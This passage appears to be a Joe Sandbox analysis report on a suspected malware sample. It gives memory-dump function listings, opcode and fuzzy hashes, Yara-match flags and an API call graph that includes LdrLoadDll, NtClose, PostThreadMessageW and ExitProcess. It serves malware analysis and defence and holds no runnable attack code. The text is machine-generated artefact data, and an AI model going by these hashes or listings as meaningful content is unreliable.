                                                    • Snapshot File: hcaresult_0_2_cbd000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 634575c91dfd69b650718b6d33ae0ce13adda9d9f05f000ad2e7463d99ab7076
                                                    • Instruction ID: 836253016db8f003a5dfef8c7066b32b98c0937b24a0eab68bf9f195ccd1e349
                                                    • Opcode Fuzzy Hash: 634575c91dfd69b650718b6d33ae0ce13adda9d9f05f000ad2e7463d99ab7076
                                                    • Instruction Fuzzy Hash: 15219F755093C08FCB02DF24D990755BF71EB46314F28C5EAD8498F2A7C33A980ACB62
                                                    Function 00CAD1F7 Relevance: .1, Instructions: 57COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1239673856.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cad000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6fa0a9b6888ab601070468a7c49be392b44274aed9e91ce62da6c30ec0883e0c
                                                    • Instruction ID: 0aaf9d995cd68919540178bd83e5bddf5c85c17ae5ce10dd1b11fba229ad87cd
                                                    • Opcode Fuzzy Hash: 6fa0a9b6888ab601070468a7c49be392b44274aed9e91ce62da6c30ec0883e0c
                                                    • Instruction Fuzzy Hash: D421E176504241CFCB06CF00D9C4B16BF72FB84314F24C2A9DC4A0B656C33AD926CBA1
                                                    Function 00CAD3D3 Relevance: .1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1239673856.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cad000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                    • Instruction ID: 6cf1d19ad4765eff363fe4ea6d27a21a2e1df868b089a1d7b08ec7eb1bc3b1eb
                                                    • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                    • Instruction Fuzzy Hash: DB112676504240CFCB05CF00D5C4B16BF72FB98324F24C2A9D80A0B656C33AE956CFA1
                                                    Function 00CBD1CF Relevance: .1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1239716126.0000000000CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cbd000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                    • Instruction ID: 63ef8e9310718b0569b6c9e4632c74775aba865c2eb0b6ffd625790e1a6a45ed
                                                    • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                    • Instruction Fuzzy Hash: 2D11BB75504280DFCB05CF10C5C0B55BBA2FB84324F24C6ADD84A4B296C33AD84ACB62
                                                    Function 00CAD759 Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1239673856.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cad000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8e35abd8769453cfa38ddac1adc07e152f6668fcd8e7b13432d989e53aa65375
                                                    • Instruction ID: 3e52483fdf9b6a360e9c41bd2e896f4fe58b586260a31712c66f9ef0e4f82614
                                                    • Opcode Fuzzy Hash: 8e35abd8769453cfa38ddac1adc07e152f6668fcd8e7b13432d989e53aa65375
                                                    • Instruction Fuzzy Hash: 4F012B310043049EE7244A12DCC4B66FF98DF42329F18C45AED1B8B68AC3789C44CAB1
                                                    Function 00CAD758 Relevance: .0, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1239673856.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cad000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 02aee37c6fc6d7b92bea14d0723e1f2eb816038c3a0b1fd18461996ea31ca0e0
                                                    • Instruction ID: 2c86fdf0c3481afca6ee5a4c3b25062ae7da5401c53d0f866a912ecbbf201bcf
                                                    • Opcode Fuzzy Hash: 02aee37c6fc6d7b92bea14d0723e1f2eb816038c3a0b1fd18461996ea31ca0e0
                                                    • Instruction Fuzzy Hash: 48F0F6310043409EE7248A06DCC4B62FFA8EF91735F18C45AED1A4B286C379AC44CBB1

                                                    Non-executed Functions

                                                    Function 026E6040 Relevance: 2.8, Strings: 2, Instructions: 298COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: PHq$PHq
                                                    • API String ID: 0-1274609152
                                                    • Opcode ID: 02b066a580775bda62a80563e50e13532625a4dc1bad68d2186b1a4731ba0aff
                                                    • Instruction ID: e56c2f562952cc4be1a225a652cf5da59ebb68f250c007f37ff14bb8a3a0aa0a
                                                    • Opcode Fuzzy Hash: 02b066a580775bda62a80563e50e13532625a4dc1bad68d2186b1a4731ba0aff
                                                    • Instruction Fuzzy Hash: 4CD1A034A01604CFDB18DF69C598BA9B7F6BF8C715F2580A9E406AB361DB31AD41CF60
                                                    Function 026E0040 Relevance: .3, Instructions: 312COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1a2d0b04cbbb7efec34ae130296cb5047dc956f3ae7ab5c3985822bc85d418cd
                                                    • Instruction ID: 33e0b28259663e9eb426fe7fa02f628705ce3f5de929a2a2028b154906d0edc0
                                                    • Opcode Fuzzy Hash: 1a2d0b04cbbb7efec34ae130296cb5047dc956f3ae7ab5c3985822bc85d418cd
                                                    • Instruction Fuzzy Hash: 95E11674E012598FDB14DFA8C580AAEFBB2BF89305F248269D415BB355C771AD42CFA0
                                                    Function 026E001E Relevance: .1, Instructions: 138COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1240055630.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_26e0000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 83c43223624ec39c8a2a88380eee2154bfb912c38c77926b936392772392ab28
                                                    • Instruction ID: ed73178a04d9d002ae77b231c2e7cdb0a55d36dca2ca28a5e4bda1927cf25615
                                                    • Opcode Fuzzy Hash: 83c43223624ec39c8a2a88380eee2154bfb912c38c77926b936392772392ab28
                                                    • Instruction Fuzzy Hash: E2514C74E052598FDB18CFA9C5805AEFBB2BF89204F24C1A9D419BB356C7319D42CF61

                                                    Execution Graph

                                                    Execution Coverage:1.2%
                                                    Dynamic/Decrypted Code Coverage:4.5%
                                                    Signature Coverage:7.1%
                                                    Total number of Nodes:154
                                                    Total number of Limit Nodes:12
                                                    execution_graph 95457 42e503 95458 42e513 95457->95458 95459 42e519 95457->95459 95462 42d503 95459->95462 95461 42e53f 95465 42b843 95462->95465 95464 42d51e 95464->95461 95466 42b85d 95465->95466 95467 42b86e RtlAllocateHeap 95466->95467 95467->95464 95468 4246e3 95469 4246f2 95468->95469 95470 424739 95469->95470 95473 424777 95469->95473 95475 42477c 95469->95475 95476 42d423 95470->95476 95474 42d423 RtlFreeHeap 95473->95474 95474->95475 95479 42b893 95476->95479 95478 424749 95480 42b8ad 95479->95480 95481 42b8be RtlFreeHeap 95480->95481 95481->95478 95482 42ab83 95483 42aba0 95482->95483 95486 12e2df0 LdrInitializeThunk 95483->95486 95484 42abc8 95486->95484 95521 424353 95522 42436f 95521->95522 95523 424397 95522->95523 95524 4243ab 95522->95524 95525 42b533 NtClose 95523->95525 95531 42b533 95524->95531 95527 4243a0 95525->95527 95528 4243b4 95534 42d543 RtlAllocateHeap 95528->95534 95530 4243bf 95532 42b550 95531->95532 95533 42b561 NtClose 95532->95533 95533->95528 95534->95530 95535 427ed3 95536 427f30 95535->95536 95537 427f67 95536->95537 95540 423d93 95536->95540 95539 427f49 95541 423d97 95540->95541 95542 423e00 95541->95542 95543 423f23 95541->95543 95544 423f38 95541->95544 95542->95539 95545 42b533 NtClose 95543->95545 95546 42b533 NtClose 95544->95546 95547 423f2c 95545->95547 95549 423f41 95546->95549 95547->95539 95548 423f6d 95548->95539 95549->95548 95550 42d423 RtlFreeHeap 95549->95550 95551 423f61 95550->95551 95551->95539 95487 41a563 95488 41a57b 95487->95488 95490 41a5d5 95487->95490 95488->95490 95491 41e153 95488->95491 95492 41e179 95491->95492 95496 41e267 95492->95496 95497 42e633 95492->95497 95494 41e20b 95494->95496 95503 42abd3 95494->95503 95496->95490 95498 42e5a3 95497->95498 95499 42e600 95498->95499 95500 42d503 RtlAllocateHeap 95498->95500 95499->95494 95501 42e5dd 95500->95501 95502 42d423 RtlFreeHeap 95501->95502 95502->95499 95504 42abf0 95503->95504 95507 12e2c0a 95504->95507 95505 42ac1c 95505->95496 95508 12e2c1f LdrInitializeThunk 95507->95508 95509 12e2c11 95507->95509 95508->95505 95509->95505 95510 414023 95511 41403d 95510->95511 95516 417a13 95511->95516 95513 41405b 95514 4140a0 95513->95514 95515 41408f PostThreadMessageW 95513->95515 95515->95514 95517 417a37 95516->95517 95518 417a73 LdrLoadDll 95517->95518 95519 417a3e 95517->95519 95518->95519 95519->95513 95552 41b033 95553 41b077 95552->95553 95554 41b098 95553->95554 95555 42b533 NtClose 95553->95555 95555->95554 95556 418c18 95557 42b533 NtClose 95556->95557 95558 418c22 95557->95558 95559 401cd9 95560 401ce0 95559->95560 95563 42e9c3 95560->95563 95566 42d013 95563->95566 95567 42d039 95566->95567 95578 407603 95567->95578 95569 42d04f 95577 401d61 95569->95577 95581 41ae43 95569->95581 95571 42d083 95592 427613 95571->95592 95572 42d06e 95572->95571 95596 42b8e3 95572->95596 95575 42d092 95576 42b8e3 ExitProcess 95575->95576 95576->95577 95599 416743 95578->95599 95580 407610 95580->95569 95582 41ae6f 95581->95582 95610 41ad33 95582->95610 95585 41aeb4 95587 41aed0 95585->95587 95590 42b533 NtClose 95585->95590 95586 41ae9c 95588 41aea7 95586->95588 95589 42b533 NtClose 95586->95589 95587->95572 95588->95572 95589->95588 95591 41aec6 95590->95591 95591->95572 95593 42766d 95592->95593 95595 42767a 95593->95595 95621 418563 95593->95621 95595->95575 95597 42b900 95596->95597 95598 42b911 ExitProcess 95597->95598 95598->95571 95600 41675a 95599->95600 95602 416773 95600->95602 95603 42bf83 95600->95603 95602->95580 95605 42bf9b 95603->95605 95604 42bfbf 95604->95602 95605->95604 95606 42abd3 LdrInitializeThunk 95605->95606 95607 42c014 95606->95607 95608 42d423 RtlFreeHeap 95607->95608 95609 42c02d 95608->95609 95609->95602 95611 41ad4d 95610->95611 95615 41ae29 95610->95615 95616 42ac73 95611->95616 95614 42b533 NtClose 95614->95615 95615->95585 95615->95586 95617 42ac90 95616->95617 95620 12e35c0 LdrInitializeThunk 95617->95620 95618 41ae1d 95618->95614 95620->95618 95623 41858d 95621->95623 95622 4189fb 95622->95595 95623->95622 95629 414153 95623->95629 95625 41869a 95625->95622 95626 42d423 RtlFreeHeap 95625->95626 95627 4186b2 95626->95627 95627->95622 95628 42b8e3 ExitProcess 95627->95628 95628->95622 95636 414172 95629->95636 95630 414290 95631 4142c7 95630->95631 95641 41b153 RtlFreeHeap LdrInitializeThunk 95630->95641 95631->95625 95633 4142a4 95633->95631 95642 41b153 RtlFreeHeap LdrInitializeThunk 95633->95642 95635 4142bd 95635->95625 95636->95630 95636->95631 95638 413ba3 95636->95638 95643 42b7b3 95638->95643 95641->95633 95642->95635 95644 42b7cd 95643->95644 95647 12e2c70 LdrInitializeThunk 95644->95647 95645 413bc5 95645->95630 95647->95645 95520 12e2b60 LdrInitializeThunk

                                                    Executed Functions

                                                    Function 00417A13 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 159 417a13-417a2f 160 417a37-417a3c 159->160 161 417a32 call 42e123 159->161 162 417a42-417a50 call 42e643 160->162 163 417a3e-417a41 160->163 161->160 166 417a60-417a71 call 42cae3 162->166 167 417a52-417a5d call 42e8e3 162->167 172 417a73-417a87 LdrLoadDll 166->172 173 417a8a-417a8d 166->173 167->166 172->173
                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417A85
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431338720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8hd98EhtIFcYkb8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: 60649801836bbc3b7d335e88a05832327e3b5b3953f5200478c210aca565a30d
                                                    • Instruction ID: 087504ced11ce5ae3600bb80fd07ff88de342a00c403e3ae3b376b9b69f6476f
                                                    • Opcode Fuzzy Hash: 60649801836bbc3b7d335e88a05832327e3b5b3953f5200478c210aca565a30d
                                                    • Instruction Fuzzy Hash: F9015EB1E4020DABDF10DAE1DC42FDEB3789F14304F0441AAF90897241F635EB548B95
                                                    Function 0042B533 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 184 42b533-42b56f call 404a13 call 42c5e3 NtClose
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431338720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8hd98EhtIFcYkb8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 817e2567bc62e56100014767b2572e00ff330e1eaff4d4c65aea6d1d8504f529
                                                    • Instruction ID: 82a7b5ecbe4320121042bc0ce666025795fd40b6d52a53db748d00e68d532f96
                                                    • Opcode Fuzzy Hash: 817e2567bc62e56100014767b2572e00ff330e1eaff4d4c65aea6d1d8504f529
                                                    • Instruction Fuzzy Hash: 03E04F723002147BD620EA5AEC41FDBB75CDBC5714F40441AFA08A7182C670B90087A9
                                                    Function 012E2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 198 12e2b60-12e2b6c LdrInitializeThunk
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: af671bcbb2bec84f81f5e69facda35edfac6e26bcfae8996cd2a21a8dbef4f66
                                                    • Instruction ID: d854cbd88b64d400967c32a13373ecf20a017edcf4d312a0d60838775308858a
                                                    • Opcode Fuzzy Hash: af671bcbb2bec84f81f5e69facda35edfac6e26bcfae8996cd2a21a8dbef4f66
                                                    • Instruction Fuzzy Hash: 1990026121240003450571584414616C00AD7E1201F55C035E3014590DC625C9A56225
                                                    Function 012E2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 200 12e2df0-12e2dfc LdrInitializeThunk
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: d1e7cdaae5709b96a16d62c9888541b7c2ab683c3a420147df43b7e30e1d4e8e
                                                    • Instruction ID: 564b9e923b55c2217a6c61bbe1205c02219ab865aba90b255707bfa866606617
                                                    • Opcode Fuzzy Hash: d1e7cdaae5709b96a16d62c9888541b7c2ab683c3a420147df43b7e30e1d4e8e
                                                    • Instruction Fuzzy Hash: A790023121140413D511715845047078009D7D1241F95C426A2424558DD756CA66A221
                                                    Function 012E2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 199 12e2c70-12e2c7c LdrInitializeThunk
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 63bf733f8ac9e5e0d944d3d7709b08a8017a4ce9443961fa0bc72882d7ca6900
                                                    • Instruction ID: 2e933515106f96864574be3d2b07d2b4ecb44796ab80b39e3106511f8deb435e
                                                    • Opcode Fuzzy Hash: 63bf733f8ac9e5e0d944d3d7709b08a8017a4ce9443961fa0bc72882d7ca6900
                                                    • Instruction Fuzzy Hash: 8090023121148802D5107158840474A8005D7D1301F59C425A6424658DC795C9A57221
                                                    Function 012E35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 201 12e35c0-12e35cc LdrInitializeThunk
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 1adc4b41a7f50b7f9a8f17c0c8db4e518099f13322cba43bf96e3b26690eb377
                                                    • Instruction ID: 4902ea48382d392a7f83eda43a51edc9f6d996a62c29c32a7470489e9bdaef28
                                                    • Opcode Fuzzy Hash: 1adc4b41a7f50b7f9a8f17c0c8db4e518099f13322cba43bf96e3b26690eb377
                                                    • Instruction Fuzzy Hash: DF90023161550402D500715845147069005D7D1201F65C425A2424568DC795CA6566A2
                                                    Function 0041401D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • PostThreadMessageW.USER32(j77tfG6,00000111,00000000,00000000), ref: 0041409A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431338720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8hd98EhtIFcYkb8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID: j77tfG6$j77tfG6
                                                    • API String ID: 1836367815-2022874598
                                                    • Opcode ID: 522fea7b6c5333d5e8873577df3d07c3102ab80ac7dd22f4e5472eb47a53283a
                                                    • Instruction ID: fdb8ea00cc876688af9016305e49a7e5f3cd94eddb5c51a48db064aa531f30fe
                                                    • Opcode Fuzzy Hash: 522fea7b6c5333d5e8873577df3d07c3102ab80ac7dd22f4e5472eb47a53283a
                                                    • Instruction Fuzzy Hash: F201E5B1D0021C7AEB11AAA59C81DEF7B7CDF81798F008029FA14B7141D67C4E0647B5
                                                    Function 00414023 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • PostThreadMessageW.USER32(j77tfG6,00000111,00000000,00000000), ref: 0041409A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431338720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8hd98EhtIFcYkb8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID: j77tfG6$j77tfG6
                                                    • API String ID: 1836367815-2022874598
                                                    • Opcode ID: bb4b5eab94c24ba465f07197b51b450afc6fff937141dc01f1743c3be1d3f2b6
                                                    • Instruction ID: b17f475d91df54eafcb80b92183fe23ab52162c3f8dc0f2472c94799e06c2192
                                                    • Opcode Fuzzy Hash: bb4b5eab94c24ba465f07197b51b450afc6fff937141dc01f1743c3be1d3f2b6
                                                    • Instruction Fuzzy Hash: 1301A5B1D0021C7AEB11AAA59C81DEF7B7CDF81798F008069FA14A7141D67C5E0647A5
                                                    Function 0042B843 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 174 42b843-42b884 call 404a13 call 42c5e3 RtlAllocateHeap
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(?,0041E20B,?,?,00000000,?,0041E20B,?,?,?), ref: 0042B87F
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431338720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8hd98EhtIFcYkb8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: a41fe5da80cc8374d2efab177e496b435cf0a5f4759d3770bfb9c2fb29cb7095
                                                    • Instruction ID: ad3349885f1a9e51169739dfbf8c2647659c3372f231d295e6aef942c0a02507
                                                    • Opcode Fuzzy Hash: a41fe5da80cc8374d2efab177e496b435cf0a5f4759d3770bfb9c2fb29cb7095
                                                    • Instruction Fuzzy Hash: ADE06DB1200214BBDA10EE59EC45FDB73ADEFC4714F000419FA08A7242C670B9108BB8
                                                    Function 0042B893 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 179 42b893-42b8d4 call 404a13 call 42c5e3 RtlFreeHeap
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,C7FFFFFF,00000007,00000000,00000004,00000000,004172F4,000000F4,?,?,?,?,?), ref: 0042B8CF
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431338720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8hd98EhtIFcYkb8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0
                                                    • Opcode ID: f267a55acd5952626e04455950c35b31330c2c9ae8cd531eafd55dd7d8fc67d3
                                                    • Instruction ID: 76d8f0fa19a20935534b3bff5c23700c9dc5efd5270ef660b7dce2b3466b09ff
                                                    • Opcode Fuzzy Hash: f267a55acd5952626e04455950c35b31330c2c9ae8cd531eafd55dd7d8fc67d3
                                                    • Instruction Fuzzy Hash: 23E039B16042147BDA20EE59EC41F9B77ACEFC5710F000419BA08A7282C670B9108BB8
                                                    Function 0042B8E3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 189 42b8e3-42b91f call 404a13 call 42c5e3 ExitProcess
                                                    APIs
                                                    • ExitProcess.KERNEL32(?,00000000,00000000,?,893822A4,?,?,893822A4), ref: 0042B91A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431338720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8hd98EhtIFcYkb8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID:
                                                    • API String ID: 621844428-0
                                                    • Opcode ID: 89c36391ecf9704e4c5b0a6f0a95ba9ec0afd7238790543a9c4ea9483ff6537d
                                                    • Instruction ID: 8123f562fc79b04dcdeced03dc955ffd5b41f6afac93f736053096b496a889c5
                                                    • Opcode Fuzzy Hash: 89c36391ecf9704e4c5b0a6f0a95ba9ec0afd7238790543a9c4ea9483ff6537d
                                                    • Instruction Fuzzy Hash: DAE04F322402147BD620EA5AEC41F9BB75CDBC5714F408019FA08AB182CA70B90087F4
                                                    Function 012E2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 194 12e2c0a-12e2c0f 195 12e2c1f-12e2c26 LdrInitializeThunk 194->195 196 12e2c11-12e2c18 194->196
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 30ddca1165c0f8dda7b3accc98bb62900dba8ffe40e1f0962c3b971daed9a668
                                                    • Instruction ID: bdb1a76d646617036db8a17a5c5a6ef7d99fc6ef314a54929e823e338f92a8fc
                                                    • Opcode Fuzzy Hash: 30ddca1165c0f8dda7b3accc98bb62900dba8ffe40e1f0962c3b971daed9a668
                                                    • Instruction Fuzzy Hash: F3B09B719115D5C5DE11E764460C717B954B7D1701F56C075D3030641F4738C1E5E375

                                                    Non-executed Functions

                                                    Function 01322349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-2160512332
                                                    • Opcode ID: 046ed2de270cc60cc86908c1f3e893ba628eb389c29d431adfdf33920e67ee92
                                                    • Instruction ID: eb81a0730bbe03b3c78059ef219e06457259a2aed369ef6007e34fa0fe60b41a
                                                    • Opcode Fuzzy Hash: 046ed2de270cc60cc86908c1f3e893ba628eb389c29d431adfdf33920e67ee92
